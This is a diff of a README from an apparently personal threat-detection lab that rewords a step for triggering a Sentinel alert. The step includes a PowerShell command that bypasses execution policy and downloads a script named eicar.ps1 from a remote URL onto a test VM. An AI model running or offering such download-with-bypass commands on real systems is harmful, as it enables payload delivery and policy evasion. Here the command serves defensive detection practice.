SecOpsPete/incident-response-sentinel/ps-suspicious-web-request/README.md

 ### 💣 Simulate Attack — Triggering the Alert

-Execute the following PowerShell command on the onboarded VM (`PVR-HUNTING2`) to simulate the attack:
+In order to generate log activity that will trigger an Incident in Sentinel, I executed the following PowerShell command on the onboarded VM (`PVR-HUNTING2`) to simulate the attack:

 ```powershell
 powershell.exe -ExecutionPolicy Bypass -Command Invoke-WebRequest -Uri https://raw.githubusercontent.com/joshmadakor1/lognpacific-public/refs/heads/main/cyber-range/entropy-gorilla/eicar.ps1 -OutFile C:\programdata\eicar.ps1